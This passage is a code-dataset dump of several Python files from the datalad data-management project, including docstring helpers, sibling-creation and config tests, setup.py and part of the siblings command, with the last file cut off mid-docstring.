"BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9648, "license_type": "permissive", "max_line_length": 87, "num_lines": 326, "path": "/datalad/dochelpers.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Utils to help with docstrings etc.\n\nLargerly borrowed from PyMVPA (as of upstream/2.4.1-23-g170496e). 
Copyright of\nthe same developers as DataLad\n\"\"\"\n\nimport logging\nimport re\nimport textwrap\nimport os\nimport sys\nimport traceback\n\nfrom datalad.support.exceptions import CapturedException\n\nlgr = logging.getLogger(\"datalad.docutils\")\n\n__add_init2doc = False\n__in_ipython = False # TODO: determine exists('running ipython env')\n\n# if ran within IPython -- might need to add doc to init\nif __in_ipython:\n __rst_mode = False # either to do ReST links at all\n # if versions['ipython'] <= '0.8.1':\n # __add_init2doc = True\nelse:\n __rst_mode = True\n\n#\n# Predefine some sugarings depending on syntax convention to be used\n#\n# XXX Might need to be removed or become proper cfg parameter\n__rst_conventions = 'numpy'\nif __rst_conventions == 'epydoc':\n _rst_sep = \"`\"\n _rst_indentstr = \" \"\n\n def _rst_section(section_name):\n \"\"\"Provide section heading\"\"\"\n return \":%s:\" % section_name\nelif __rst_conventions == 'numpy':\n _rst_sep = \"\"\n _rst_indentstr = \"\"\n\n def _rst_section(section_name):\n \"\"\"Provide section heading\"\"\"\n return \"%s\\n%s\" % (section_name, '-' * len(section_name))\nelse:\n raise ValueError(\"Unknown convention %s for RST\" % __rst_conventions)\n\n\ndef _rst(s, snotrst=''):\n \"\"\"Produce s only in __rst mode\"\"\"\n if __rst_mode:\n return s\n else:\n return snotrst\n\n\ndef _rst_underline(text, markup):\n \"\"\"Add and underline RsT string matching the length of the given string.\n \"\"\"\n return text + '\\n' + markup * len(text)\n\n\ndef single_or_plural(single, plural, n, include_count=False):\n \"\"\"Little helper to spit out single or plural version of a word.\n \"\"\"\n ni = int(n)\n msg = \"%d \" % ni if include_count else \"\"\n if ni > 1 or ni == 0:\n # 1 forest, 2 forests, 0 forests\n return msg + plural\n else:\n return msg + single\n\n\ndef handle_docstring(text, polite=True):\n \"\"\"Take care of empty and non existing doc strings.\"\"\"\n if text is None or not len(text):\n if polite:\n return '' # No documentation found. 
Sorry!'\n else:\n return ''\n else:\n # Problem is that first line might often have no offset, so might\n # need to be ignored from dedent call\n if not text.startswith(' '):\n lines = text.split('\\n')\n text2 = '\\n'.join(lines[1:])\n return lines[0] + \"\\n\" + textwrap.dedent(text2)\n else:\n return textwrap.dedent(text)\n\n\ndef _indent(text, istr=_rst_indentstr):\n \"\"\"Simple indenter\n \"\"\"\n return '\\n'.join(istr + s for s in text.split('\\n'))\n\n\n__parameters_str_re = re.compile(r\"[\\n^]\\s*:?Parameters?:?\\s*\\n(:?\\s*-+\\s*\\n)?\")\n\"\"\"regexp to match :Parameter: and :Parameters: stand alone in a line\nor\nParameters\n----------\nin multiple lines\"\"\"\n\n\ndef _split_out_parameters(initdoc):\n \"\"\"Split documentation into (header, parameters, suffix)\n\n Parameters\n ----------\n initdoc : string\n The documentation string\n \"\"\"\n\n # TODO: bind it to the only word in the line\n p_res = __parameters_str_re.search(initdoc)\n if p_res is None:\n return initdoc, \"\", \"\"\n else:\n # Could have been accomplished also via re.match\n\n # where new line is after :Parameters:\n # parameters header index\n ph_i = p_res.start()\n\n # parameters body index\n pb_i = p_res.end()\n\n # end of parameters\n try:\n pe_i = initdoc.index('\\n\\n', pb_i)\n except ValueError:\n pe_i = len(initdoc)\n\n result = (initdoc[:ph_i].rstrip('\\n '),\n initdoc[pb_i:pe_i],\n initdoc[pe_i:])\n\n # XXX a bit of duplication of effort since handle_docstring might\n # do splitting internally\n return handle_docstring(result[0], polite=False).strip('\\n'), \\\n textwrap.dedent(result[1]).strip('\\n'), \\\n textwrap.dedent(result[2]).strip('\\n')\n\n\n__re_params = re.compile(r'(?:\\n\\S.*?)+$')\n__re_spliter1 = re.compile(r'\\n(?=\\S)')\n__re_spliter2 = re.compile('[\\n:]')\n\n\ndef _parse_parameters(paramdoc):\n \"\"\"Parse parameters and return list of (name, full_doc_string)\n\n It is needed to remove multiple entries for the same parameter\n like it could be with adding parameters from the parent class\n\n It assumes that previously parameters were unwrapped, so their\n documentation starts at the beginning of the string, like what\n should it be after _split_out_parameters\n \"\"\"\n entries = __re_spliter1.split(paramdoc)\n result = [(__re_spliter2.split(e)[0].strip(), e)\n for e in entries if e != '']\n lgr.log(\n 1,\n 'parseParameters: Given \"%s\", we split into %s',\n paramdoc, result,\n )\n return result\n\n\ndef get_docstring_split(f):\n \"\"\"Given a function, break it up into portions\n\n Parameters\n ----------\n f : function\n\n Returns\n -------\n\n (initial doc string, params (as list of tuples), suffix string)\n \"\"\"\n\n if not hasattr(f, '__doc__') or f.__doc__ in (None, \"\"):\n return None, None, None\n initdoc, params, suffix = _split_out_parameters(\n f.__doc__)\n params_list = _parse_parameters(params)\n return initdoc, params_list, suffix\n\n\ndef borrowdoc(cls, methodname=None):\n \"\"\"Return a decorator to borrow docstring from another `cls`.`methodname`\n\n It should not be used for __init__ methods of classes derived from\n ClassWithCollections since __doc__'s of those are handled by the\n AttributeCollector anyways.\n\n Common use is to borrow a docstring from the class's method for an\n adapter function (e.g. 
sphere_searchlight borrows from Searchlight)\n\n Examples\n --------\n To borrow `__repr__` docstring from parent class `Mapper`, do::\n\n @borrowdoc(Mapper)\n def __repr__(self):\n ...\n\n Parameters\n ----------\n cls\n Usually a parent class\n methodname : None or str\n Name of the method from which to borrow. If None, would use\n the same name as of the decorated method\n \"\"\"\n\n def _borrowdoc(method):\n \"\"\"Decorator which assigns to the `method` docstring from another\n \"\"\"\n if methodname is None:\n other_method = getattr(cls, method.__name__)\n else:\n other_method = getattr(cls, methodname)\n if hasattr(other_method, '__doc__'):\n method.__doc__ = other_method.__doc__\n return method\n return _borrowdoc\n\n\ndef borrowkwargs(cls=None, methodname=None, exclude=None):\n \"\"\"Return a decorator which would borrow docstring for ``**kwargs``\n\n Notes\n -----\n TODO: take care about ``*args`` in a clever way if those are also present\n\n Examples\n --------\n In the simplest scenario -- just grab all arguments from parent class::\n\n @borrowkwargs(A)\n def met1(self, desc, **kwargs):\n pass\n\n Parameters\n ----------\n methodname : None or str\n Name of the method from which to borrow. If None, would use\n the same name as of the decorated method\n exclude : None or list of arguments to exclude\n If function does not pass all ``**kwargs``, you would need to list\n those here to be excluded from borrowed docstring\n \"\"\"\n\n def _borrowkwargs(method):\n \"\"\"Decorator which borrows docstrings for ``**kwargs`` for the `method`\n \"\"\"\n if cls:\n if methodname is None:\n other_method = getattr(cls, method.__name__)\n else:\n other_method = getattr(cls, methodname)\n elif methodname:\n other_method = methodname\n\n # TODO:\n # method.__doc__ = enhanced_from(other_method.__doc__)\n\n mdoc, odoc = method.__doc__, other_method.__doc__\n if mdoc is None:\n mdoc = ''\n\n mpreamble, mparams, msuffix = _split_out_parameters(mdoc)\n opreamble, oparams, osuffix = _split_out_parameters(odoc)\n mplist = _parse_parameters(mparams)\n oplist = _parse_parameters(oparams)\n known_params = set([i[0] for i in mplist])\n\n # !!! 
has to not rebind exclude variable\n skip_params = exclude or [] # handle None\n skip_params = set(['kwargs', '**kwargs'] + skip_params)\n\n # combine two and filter out items to skip\n aplist = [i for i in mplist if not i[0] in skip_params]\n aplist += [i for i in oplist\n if not i[0] in skip_params.union(known_params)]\n\n docstring = mpreamble\n if len(aplist):\n params_ = '\\n'.join([i[1].rstrip() for i in aplist])\n docstring += \"\\n\\n%s\\n\" \\\n % _rst_section('Parameters') + _indent(params_)\n\n if msuffix != \"\":\n docstring += \"\\n\\n\" + msuffix\n\n docstring = handle_docstring(docstring)\n\n # Finally assign generated doc to the method\n method.__doc__ = docstring\n return method\n return _borrowkwargs\n\n\ndef exc_str(exc=None, limit=None, include_str=True):\n \"\"\"Temporary adapter\n\n The CapturedException should be available and be used directly instead.\n \"\"\"\n\n return str(CapturedException(exc))\n" }, { "alpha_fraction": 0.5670304894447327, "alphanum_fraction": 0.57012540102005, "avg_line_length": 31.31052589416504, "blob_id": "efc939665e28d079b12c3822a2cea163c1171acc", "content_id": "79ae3050aa0b70bf2d7aa8f1e4de407dd9a0a92c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6139, "license_type": "permissive", "max_line_length": 80, "num_lines": 190, "path": "/datalad/distributed/tests/test_create_sibling_ghlike.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test create publication target on GIN\"\"\"\n\nimport os\nfrom os.path import basename\nfrom unittest.mock import patch\n\nimport requests\n\nfrom datalad.api import (\n Dataset,\n create_sibling_gin,\n)\nfrom datalad.downloaders.http import DEFAULT_USER_AGENT\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_in,\n assert_in_results,\n assert_raises,\n assert_result_count,\n assert_status,\n eq_,\n with_tempfile,\n)\n\n\n@with_tempfile\ndef test_invalid_call(path=None):\n # no dataset\n assert_raises(ValueError, create_sibling_gin, 'bogus', dataset=path)\n ds = Dataset(path).create()\n # without authorization\n # force disable any configured token\n with patch('datalad.distributed.create_sibling_ghlike.Token', None):\n assert_raises(ValueError, ds.create_sibling_gin, 'bogus')\n # unsupported name\n assert_raises(\n ValueError,\n ds.create_sibling_gin, 'bo gus', credential='some')\n\n # conflicting sibling name\n ds.siblings('add', name='gin', url='http://example.com',\n result_renderer='disabled')\n res = ds.create_sibling_gin(\n 'bogus', name='gin', credential='some', on_failure='ignore',\n dry_run=True)\n assert_status('error', res)\n assert_in_results(\n res,\n status='error',\n message=('already has a configured sibling \"%s\"', 'gin'))\n\n\n@with_tempfile\ndef test_dryrun(path=None):\n ds = Dataset(path).create()\n # see that the correct request would be made\n res = ds.create_sibling_gin('bogus', credential='some', dry_run=True)\n assert_result_count(res, 1)\n res = res[0]\n eq_(res['request_url'], 'https://gin.g-node.org/api/v1/user/repos')\n # we dont care much which user-agent, but there should be one\n assert_in('user-agent', res['request_headers'])\n # only a placeholder no-token 
makes it into the request\n assert_in('NO-TOKEN-AVAILABLE', res['request_headers']['authorization'])\n # correct name\n eq_(res['request_data']['name'], 'bogus')\n # public by default\n eq_(res['request_data']['private'], False)\n # it is important that we do not tell the portal to generate some\n # repo content\n eq_(res['request_data']['auto_init'], False)\n\n # org repo\n res = ds.create_sibling_gin('strangeorg/bogus', credential='some',\n dry_run=True)\n assert_result_count(res, 1)\n res = res[0]\n eq_(res['request_data']['name'], 'bogus')\n eq_(res['request_url'],\n 'https://gin.g-node.org/api/v1/org/strangeorg/repos')\n\n # recursive name, building\n subds = ds.create('subds')\n res = ds.create_sibling_gin(\n 'bogus', recursive=True, credential='some', dry_run=True)\n eq_(res[-1]['request_data']['name'], 'bogus-subds')\n\n # ignore unavailable datasets\n ds.drop('subds', what='all', reckless='kill', recursive=True)\n res = ds.create_sibling_gin(\n 'bogus', recursive=True, credential='some', dry_run=True)\n eq_(len(res), 1)\n\n\ndef check4real(testcmd, testdir, credential, api, delete_endpoint,\n access_protocol='https', moretests=None):\n token_var = f'DATALAD_CREDENTIAL_{credential.upper()}_TOKEN'\n if token_var not in os.environ:\n raise SkipTest(f'No {credential} access token available')\n\n ds = Dataset(testdir).create()\n assert_raises(\n ValueError,\n testcmd,\n 'somerepo',\n dataset=ds,\n api=api,\n credential='bogus',\n )\n\n reponame = basename(testdir).replace('datalad_temp_test', 'dltst')\n try:\n res = testcmd(\n reponame,\n dataset=ds,\n api=api,\n credential=credential,\n name='ghlike-sibling',\n access_protocol=access_protocol,\n )\n assert_in_results(\n res,\n status='ok',\n preexisted=False,\n reponame=reponame,\n private=False)\n assert_in_results(\n res,\n status='ok',\n action='configure-sibling',\n name='ghlike-sibling',\n )\n # now do it again\n ds.siblings('remove', name='ghlike-sibling', result_renderer='disabled')\n res = testcmd(\n reponame, dataset=ds, api=api, credential=credential,\n access_protocol=access_protocol,\n on_failure='ignore')\n assert_result_count(res, 1)\n assert_in_results(\n res,\n status='impossible',\n message=\"repository already exists\",\n preexisted=True,\n )\n # existing=skip must not \"fix\" this:\n # https://github.com/datalad/datalad/issues/5941\n res = testcmd(reponame, dataset=ds, api=api, existing='skip',\n access_protocol=access_protocol,\n credential=credential, on_failure='ignore')\n assert_result_count(res, 1)\n assert_in_results(\n res,\n status='error',\n preexisted=True,\n )\n # but existing=reconfigure does\n res = testcmd(reponame, dataset=ds, api=api, existing='reconfigure',\n access_protocol=access_protocol,\n credential=credential)\n assert_result_count(res, 2)\n assert_in_results(\n res,\n status='notneeded',\n preexisted=True,\n )\n assert_in_results(\n res,\n action='configure-sibling',\n status='ok',\n )\n if moretests:\n moretests(ds)\n finally:\n token = os.environ[token_var]\n requests.delete(\n '{}/{}'.format(api, delete_endpoint.format(reponame=reponame)),\n headers={\n 'user-agent': DEFAULT_USER_AGENT,\n 'authorization':\n f'token {token}',\n },\n ).raise_for_status()\n" }, { "alpha_fraction": 0.6098807454109192, "alphanum_fraction": 0.6121521592140198, "avg_line_length": 25.25373077392578, "blob_id": "fd1cc904845fb39bfca9e5c44c972227b7ee6e78", "content_id": "af2222cf94a54b4e4b7c779f318e67be3178e36e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 1761, "license_type": "permissive", "max_line_length": 64, "num_lines": 67, "path": "/datalad/support/tests/test_extensions.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from datalad.tests.utils_pytest import (\n assert_in,\n assert_raises,\n eq_,\n nok_,\n ok_,\n)\n\nfrom ..extensions import (\n has_config,\n register_config,\n)\n\n\ndef test_register_config():\n nok_(has_config('datalad.testdummies.invalid'))\n assert_raises(\n ValueError,\n register_config,\n 'datalad.testdummies.invalid',\n title=None,\n dialog='yesno')\n nok_(has_config('datalad.testdummies.invalid'))\n\n cfgkey = 'datalad.testdummies.try1'\n nok_(has_config(cfgkey))\n register_config(\n cfgkey,\n 'This is what happens, when you do not listen to mama!',\n default_fn=lambda: 5,\n description='Try on-access default \"computation\"',\n type=int,\n dialog='question',\n scope='global',\n )\n\n from datalad.interface.common_cfg import definitions\n assert_in(cfgkey, definitions)\n # same thing, other part of the API\n assert_in(cfgkey, definitions.keys())\n # and yet another\n assert_in(cfgkey, [k for k, v in definitions.items()])\n # one more still\n assert_in(cfgkey, [k for k in definitions])\n # more smoke testing, we must have at least this one\n ok_(len(definitions))\n\n df = definitions[cfgkey]\n # on access default computation\n eq_(df['default'], 5)\n\n # we could set any novel property\n df['novel'] = 'unexpected'\n eq_(df.get('novel'), 'unexpected')\n eq_(df.get('toonovel'), None)\n # smoke test str/repr\n assert_in('mama', str(df))\n assert_in('mama', repr(df))\n\n # internal data structure for UI was assembled\n assert_in('ui', df)\n # more smoke\n assert_in('ui', df.keys())\n assert_in('ui', [k for k in df])\n nkeys = len(df)\n df.update(funky='seven')\n eq_(len(df), nkeys + 1)\n\n\n" }, { "alpha_fraction": 0.5607993006706238, "alphanum_fraction": 0.5642006993293762, "avg_line_length": 37.557376861572266, "blob_id": "e4f02ebb74e0c9af158e1bd2dc88f2a0bed925a4", "content_id": "7cb2a85ebdb28da78a15a90835b10e3617d5d545", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2352, "license_type": "permissive", "max_line_length": 87, "num_lines": 61, "path": "/tools/copy_urls_from_datalad.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Little helper to copy all URLs which were mistakenly submitted to datalad\nremote instead of straight to web.\n\nMay be later could be RFed into some helper function if comes needed again\n\"\"\"\n\nfrom collections import defaultdict\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad import lgr\nfrom tqdm import tqdm\n\n\ndef get_remote_urls(rec, remote):\n for k, v in rec.items():\n if v.get('description', '') in [remote, '[%s]' % remote]:\n return v.get('urls', [])\n return []\n\nif __name__ == '__main__':\n annex = AnnexRepo('.', create=False, init=False)\n # enable datalad special remote\n urls_to_register = defaultdict(list) # key: urls\n try:\n annex.call_annex([\"enableremote\", \"datalad\"])\n # go 
through each and see where urls aren't yet under web\n # seems might have also --in=datalad to restrict\n w = annex.whereis([], options=['--all'], output='full')\n lgr.info(\"Got %d entries\", len(w))\n for k, rec in tqdm(w.items()):\n datalad_urls = get_remote_urls(rec, 'datalad')\n web_urls = set(get_remote_urls(rec, 'web'))\n for url in datalad_urls:\n if url not in web_urls:\n if 'openneuro.s3' in url or 'openfmri.s3' in url:\n urls_to_register[k].append(url)\n else:\n lgr.warning(\"Found unexpected url %s\" % url)\n\n finally:\n # disable datalad special remote\n annex.remove_remote(\"datalad\") # need to disable it first\n lgr.info(\n \"Got %d entries which could get new urls\",\n len(urls_to_register)\n )\n for k, urls in tqdm(urls_to_register.items()):\n for url in urls:\n annex.call_annex([\n \"registerurl\", '-c', 'annex.alwayscommit=false', k, url])\n # to cause annex to commit all the changes\n annex.call_annex([\"merge\"])\n annex.gc(allow_background=False)\n" }, { "alpha_fraction": 0.5886337161064148, "alphanum_fraction": 0.601685106754303, "avg_line_length": 32.258243560791016, "blob_id": "79da6bc7fd226f3fc6f9ad00fdf053f878918e04", "content_id": "0f211bad61cf7c2dea66ce21636120ab9e0936d4", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6053, "license_type": "permissive", "max_line_length": 92, "num_lines": 182, "path": "/setup.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the DataLad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport sys\nfrom os.path import dirname\nfrom os.path import join as opj\n\n# This is needed for versioneer to be importable when building with PEP 517.\n# See <https://github.com/warner/python-versioneer/issues/193> and links\n# therein for more information.\nsys.path.append(dirname(__file__))\n\nimport versioneer\nfrom _datalad_build_support.setup import (\n BuildConfigInfo,\n BuildManPage,\n datalad_setup,\n)\n\nrequires = {\n 'core': [\n 'platformdirs',\n 'chardet>=3.0.4', # rarely used but small/omnipresent\n 'colorama; platform_system==\"Windows\"',\n 'distro; python_version >= \"3.8\"',\n 'importlib-metadata >=3.6; python_version < \"3.10\"',\n 'importlib-resources >= 3.0; python_version < \"3.9\"',\n 'iso8601',\n 'humanize',\n 'fasteners>=0.14',\n 'packaging',\n 'patool>=1.7',\n 'tqdm>=4.32.0',\n 'typing_extensions>=4.0.0; python_version < \"3.11\"',\n 'annexremote',\n 'looseversion',\n ],\n 'downloaders': [\n 'boto',\n 'keyring>=20.0,!=23.9.0',\n 'keyrings.alt',\n 'msgpack',\n 'requests>=1.2',\n ],\n 'downloaders-extra': [\n 'requests_ftp',\n ],\n 'publish': [\n 'python-gitlab', # required for create-sibling-gitlab\n ],\n 'misc': [\n 'argcomplete>=1.12.3', # optional CLI completion\n 'pyperclip', # clipboard manipulations\n 'python-dateutil', # add support for more date formats to check_dates\n ],\n 'tests': [\n 'BeautifulSoup4', # VERY weak requirement, still used in one of the tests\n 'httpretty>=0.9.4', # Introduced py 3.6 support\n 'mypy',\n 'pytest',\n 'pytest-cov',\n 'pytest-fail-slow~=0.2',\n 'types-python-dateutil',\n 'types-requests',\n 'vcrpy',\n ],\n 'duecredit': [\n 'duecredit', # needs >= 0.6.6 to be usable, but should be \"safe\" with prior ones\n ],\n}\n\nrequires['full'] = 
sum(list(requires.values()), [])\n\n# Now add additional ones useful for development\nrequires.update({\n 'devel-docs': [\n # used for converting README.md -> .rst for long_description\n 'pypandoc',\n # Documentation\n 'sphinx>=4.3.0',\n 'sphinx-autodoc-typehints',\n 'sphinx-rtd-theme>=0.5.1',\n ],\n 'devel-utils': [\n 'asv', # benchmarks\n 'coverage',\n 'gprof2dot', # rendering cProfile output as a graph image\n 'psutil',\n 'pytest-xdist', # parallelize pytest runs etc\n # disable for now, as it pulls in ipython 6, which is PY3 only\n #'line-profiler',\n # necessary for accessing SecretStorage keyring (system wide Gnome\n # keyring) but not installable on travis, IIRC since it needs connectivity\n # to the dbus whenever installed or smth like that, thus disabled here\n # but you might need it\n # 'dbus-python',\n 'scriv', # changelog\n ],\n})\nrequires['devel'] = sum(list(requires.values()), [])\n\n\n# let's not build manpages and examples automatically (gh-896)\n# configure additional command for custom build steps\n#class DataladBuild(build_py):\n# def run(self):\n# self.run_command('build_manpage')\n# self.run_command('build_examples')\n# build_py.run(self)\n\ncmdclass = {\n 'build_manpage': BuildManPage,\n # 'build_examples': BuildRSTExamplesFromScripts,\n 'build_cfginfo': BuildConfigInfo,\n # 'build_py': DataladBuild\n}\n\nsetup_kwargs = {}\n\n# normal entrypoints for the rest\n# a bit of a dance needed, as on windows the situation is different\nentry_points = {\n 'console_scripts': [\n 'datalad=datalad.cli.main:main',\n 'git-annex-remote-datalad-archives=datalad.customremotes.archives:main',\n 'git-annex-remote-datalad=datalad.customremotes.datalad:main',\n 'git-annex-remote-ria=datalad.customremotes.ria_remote:main',\n 'git-annex-remote-ora=datalad.distributed.ora_remote:main',\n 'git-credential-datalad=datalad.local.gitcredential_datalad:git_credential_datalad',\n ],\n}\nsetup_kwargs['entry_points'] = entry_points\n\nclassifiers = [\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Education',\n 'Intended Audience :: End Users/Desktop',\n 'Intended Audience :: Science/Research',\n 'License :: DFSG approved',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Operating System :: POSIX',\n 'Programming Language :: Python :: 3 :: Only',\n 'Programming Language :: Unix Shell',\n 'Topic :: Communications :: File Sharing',\n 'Topic :: Education',\n 'Topic :: Internet',\n 'Topic :: Other/Nonlisted Topic',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Software Development :: Version Control :: Git',\n 'Topic :: Utilities',\n]\nsetup_kwargs['classifiers'] = classifiers\n\nsetup_kwargs[\"version\"] = versioneer.get_version()\ncmdclass.update(versioneer.get_cmdclass())\n\ndatalad_setup(\n 'datalad',\n description=\"data distribution geared toward scientific datasets\",\n install_requires=\n requires['core'] + requires['downloaders'] +\n requires['publish'],\n python_requires='>=3.7',\n project_urls={'Homepage': 'https://www.datalad.org',\n 'Developer docs': 'https://docs.datalad.org/en/stable',\n 'User handbook': 'https://handbook.datalad.org',\n 'Source': 'https://github.com/datalad/datalad',\n 'Bug Tracker': 'https://github.com/datalad/datalad/issues'},\n extras_require=requires,\n cmdclass=cmdclass,\n include_package_data=True,\n **setup_kwargs\n)\n" }, { "alpha_fraction": 0.4243542551994324, 
"alphanum_fraction": 0.4292742908000946, "avg_line_length": 31.520000457763672, "blob_id": "51762394eb2b5bb384aac75c937a442ef13fdebb", "content_id": "0c58af0e30e5a42c44c65ebb0b4c2bedf4bc3dc5", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 813, "license_type": "permissive", "max_line_length": 86, "num_lines": 25, "path": "/tools/which.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport os\nimport os.path as op\nimport sys\nimport subprocess\n\nif __name__ == '__main__':\n cmd = sys.argv[1]\n extra = sys.argv[2:]\n for path in os.environ['PATH'].split(os.pathsep):\n for ext in '', '.exe', '.bat', '.com':\n exe = op.join(path, cmd + ext)\n # print(exe)\n if op.lexists(exe):\n if extra:\n r = subprocess.run([exe] + extra, capture_output=True, check=True)\n print(exe, r.returncode == 0 and \"ok\" or \"failed\")\n for o in \"stdout\", \"stderr\":\n out = getattr(r, o)\n if out:\n print(f'{o}:')\n print(out.decode())\n else:\n print(exe)\n" }, { "alpha_fraction": 0.5524734258651733, "alphanum_fraction": 0.5560048818588257, "avg_line_length": 37.79889678955078, "blob_id": "c8d7b6a281d4e6c1197a9ff7e4dd266e8c2b2867", "content_id": "8b77524fb7a4dd4293cab9bc33413c2d69119c0b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 35113, "license_type": "permissive", "max_line_length": 147, "num_lines": 905, "path": "/datalad/distribution/siblings.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Plumbing command for managing sibling configuration\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport logging\nimport os\nimport os.path as op\nfrom urllib.parse import urlparse\n\nimport datalad.support.ansi_colors as ac\nfrom datalad.distribution.dataset import (\n Dataset,\n require_dataset,\n)\nfrom datalad.distribution.update import Update\nfrom datalad.downloaders.credentials import UserPassword\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import (\n annex_group_opt,\n annex_groupwanted_opt,\n annex_required_opt,\n annex_wanted_opt,\n as_common_datasrc,\n inherit_opt,\n location_description,\n publish_by_default,\n publish_depends,\n recursion_flag,\n recursion_limit,\n)\nfrom datalad.interface.results import get_status_dict\nfrom datalad.interface.utils import generic_result_renderer\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.constraints import (\n EnsureBool,\n EnsureChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.exceptions import (\n AccessDeniedError,\n AccessFailedError,\n CapturedException,\n CommandError,\n DownloadError,\n InsufficientArgumentsError,\n RemoteNotAvailableError,\n)\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.network import (\n RI,\n URL,\n PathRI,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.utils import (\n Path,\n ensure_list,\n slash_join,\n)\n\nfrom .dataset import (\n EnsureDataset,\n 
datasetmethod,\n)\n\nlgr = logging.getLogger('datalad.distribution.siblings')\n\n\ndef _mangle_urls(url, ds_name):\n if not url:\n return url\n return url.replace(\"%NAME\", ds_name.replace(\"/\", \"-\"))\n\n\n@build_doc\nclass Siblings(Interface):\n \"\"\"Manage sibling configuration\n\n This command offers four different actions: 'query', 'add', 'remove',\n 'configure', 'enable'. 'query' is the default action and can be used to obtain\n information about (all) known siblings. 'add' and 'configure' are highly\n similar actions, the only difference being that adding a sibling\n with a name that is already registered will fail, whereas\n re-configuring a (different) sibling under a known name will not\n be considered an error. 'enable' can be used to complete access\n configuration for non-Git sibling (aka git-annex special remotes).\n Lastly, the 'remove' action allows for the\n removal (or de-configuration) of a registered sibling.\n\n For each sibling (added, configured, or queried) all known sibling\n properties are reported. This includes:\n\n \"name\"\n Name of the sibling\n\n \"path\"\n Absolute path of the dataset\n\n \"url\"\n For regular siblings at minimum a \"fetch\" URL, possibly also a\n \"pushurl\"\n\n Additionally, any further configuration will also be reported using\n a key that matches that in the Git configuration.\n\n By default, sibling information is rendered as one line per sibling\n following this scheme::\n\n <dataset_path>: <sibling_name>(<+|->) [<access_specification]\n\n where the `+` and `-` labels indicate the presence or absence of a\n remote data annex at a particular remote, and `access_specification`\n contains either a URL and/or a type label for the sibling.\n \"\"\"\n # make the custom renderer the default, path reporting isn't the top\n # priority here\n result_renderer = 'tailored'\n\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"specify the dataset to configure. If\n no dataset is given, an attempt is made to identify the dataset\n based on the input and/or the current working directory\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n name=Parameter(\n args=('-s', '--name',),\n metavar='NAME',\n doc=\"\"\"name of the sibling. For addition with path \"URLs\" and\n sibling removal this option is mandatory, otherwise the hostname\n part of a given URL is used as a default. This option can be used\n to limit 'query' to a specific sibling.\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n action=Parameter(\n args=('action',),\n nargs='?',\n doc=\"\"\"command action selection (see general documentation)\"\"\",\n constraints=EnsureChoice('query', 'add', 'remove', 'configure', 'enable')),\n url=Parameter(\n args=('--url',),\n doc=\"\"\"the URL of or path to the dataset sibling named by\n `name`. 
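# --- Illustrative usage sketch (not part of the original module) ---
# The class docstring above describes the 'query', 'add', 'configure',
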